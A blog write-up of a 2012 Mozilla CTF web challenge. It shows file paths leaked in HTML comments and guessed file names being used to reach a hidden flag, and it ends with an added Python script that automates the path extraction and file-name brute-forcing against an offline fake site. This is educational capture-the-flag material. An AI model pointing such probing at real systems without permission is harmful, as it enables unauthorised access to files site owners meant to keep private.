Thursday, January 26, 2012

Mozilla CTF 2012 - The Fish Blog

Challenge:
The Fish Lover's Blog contains some hidden information. Find it!

Solution:

There's not a lot of explanation for this challenge. Again, we used Burp Suite Pro to intercept our web traffic to and from the challenge site. Loading the initial page, we noticed the following comments in the HTML source:
<!-- the files are stored at /webserver_upload_3043493/ctf/hidden_files/ -->
<!-- BUGBUG: make sure permissions on directories and files are correct -->
Hmmm... Loading up http://challenge13.mozillactf.org/webserver_upload_3043493/ctf/hidden_files/ gives us a 403 Forbidden. A 403 rather than a 404 tells us the directory exists (directory listing is just denied), but we still don't know where the flag is, and files inside the directory may well still be readable individually. There's a Shockwave object embedded in the page displaying a fish animation, but that is just a red herring (bad pun).

Well, it's a low-point challenge. Maybe we could just guess the name of the flag file?
GET /webserver_upload_3043493/ctf/hidden_files/flag HTTP/1.1

HTTP/1.1 404 Not Found
No luck.
GET /webserver_upload_3043493/ctf/hidden_files/flag.php HTTP/1.1

HTTP/1.1 404 Not Found
Still no love.
GET /webserver_upload_3043493/ctf/hidden_files/flag.txt HTTP/1.1

HTTP/1.1 200 OK


youJustGotTheFlagDudeCongrats
Woot! Another 50 points...
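The whole procedure above (pull the disclosed path out of the HTML comments, confirm the directory exists from the 403, then guess file names under it) is small enough to script. The following is an added example written for this writeup, not code from the original post or the CTF organisers; the target site is constructed in memory so it runs offline, and the candidate name list, the host name fishblog.example and the helper names are assumptions. The http_fetch helper is what you would swap in against a real, authorised target.

```python
"""Hidden-directory discovery, Fish Blog style: extract directory paths
from HTML comments, check whether the directory exists (403 vs 404),
then probe a short list of candidate file names under it."""
import re
import urllib.error
import urllib.request
from itertools import product
from typing import Callable, Iterable
from urllib.parse import urljoin, urlsplit

Fetch = Callable[[str], tuple[int, str]]   # url -> (status code, body)

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
# Heuristic: an absolute path ending in "/" that is not part of a URL or word.
DIR_RE = re.compile(r"(?<![\w.:/])(/[\w./-]*/)")

# Assumed guess list; extend with a real wordlist for anything non-trivial.
STEMS = ["flag", "key", "secret"]
EXTS = ["", ".txt", ".php", ".html"]


def extract_comment_dirs(page: str) -> list[str]:
    """Directory-looking absolute paths mentioned inside HTML comments."""
    dirs: list[str] = []
    for m in COMMENT_RE.finditer(page):
        for path in DIR_RE.findall(m.group(1)):
            if path not in dirs:
                dirs.append(path)
    return dirs


def http_fetch(url: str) -> tuple[int, str]:
    """Real fetch over urllib; 4xx/5xx are returned as values, not raised."""
    req = urllib.request.Request(url, headers={"User-Agent": "ctf-probe"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def probe_directory(fetch: Fetch, base: str, directory: str,
                    stems: Iterable[str], exts: Iterable[str]) -> dict:
    """Request the directory itself, then every stem+ext combination.

    Returns {"listing": status of the bare directory (403 = exists but
    listing denied, 404 = probably does not exist), "tried": count,
    "hits": {path: body} for every 200 response}.
    """
    listing_status, _ = fetch(urljoin(base, directory))
    result = {"listing": listing_status, "tried": 0, "hits": {}}
    for stem, ext in product(stems, exts):
        path = directory + stem + ext
        status, body = fetch(urljoin(base, path))
        result["tried"] += 1
        if status == 200:
            result["hits"][path] = body.strip()
    return result


def find_hidden_files(fetch: Fetch, base: str) -> dict:
    """Fetch the front page and probe every directory its comments leak."""
    _, page = fetch(base)
    return {d: probe_directory(fetch, base, d, STEMS, EXTS)
            for d in extract_comment_dirs(page)}


# Constructed stand-in for the challenge site (not the real responses).
FAKE_SITE = {
    "/": (200, "<html><body><h1>The Fish Lover's Blog</h1>\n"
               "<!-- the files are stored at "
               "/webserver_upload_3043493/ctf/hidden_files/ -->\n"
               "<!-- BUGBUG: make sure permissions on directories and "
               "files are correct -->\n</body></html>"),
    "/webserver_upload_3043493/ctf/hidden_files/": (403, "Forbidden"),
    "/webserver_upload_3043493/ctf/hidden_files/flag.txt":
        (200, "youJustGotTheFlagDudeCongrats\n"),
}


def fake_fetch(url: str) -> tuple[int, str]:
    """Offline fetch backed by FAKE_SITE; anything unknown is a 404."""
    return FAKE_SITE.get(urlsplit(url).path, (404, "Not Found"))


if __name__ == "__main__":
    for directory, info in find_hidden_files(fake_fetch, "http://fishblog.example/").items():
        print(f"{directory}: listing={info['listing']} tried={info['tried']}")
        for path, body in info["hits"].items():
            print(f"  200 {path} -> {body}")
```

Run it as-is and it walks the constructed site exactly as the writeup did by hand; pass http_fetch instead of fake_fetch to point it at a live host, but only one you are permitted to test, since every guess is a logged request.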
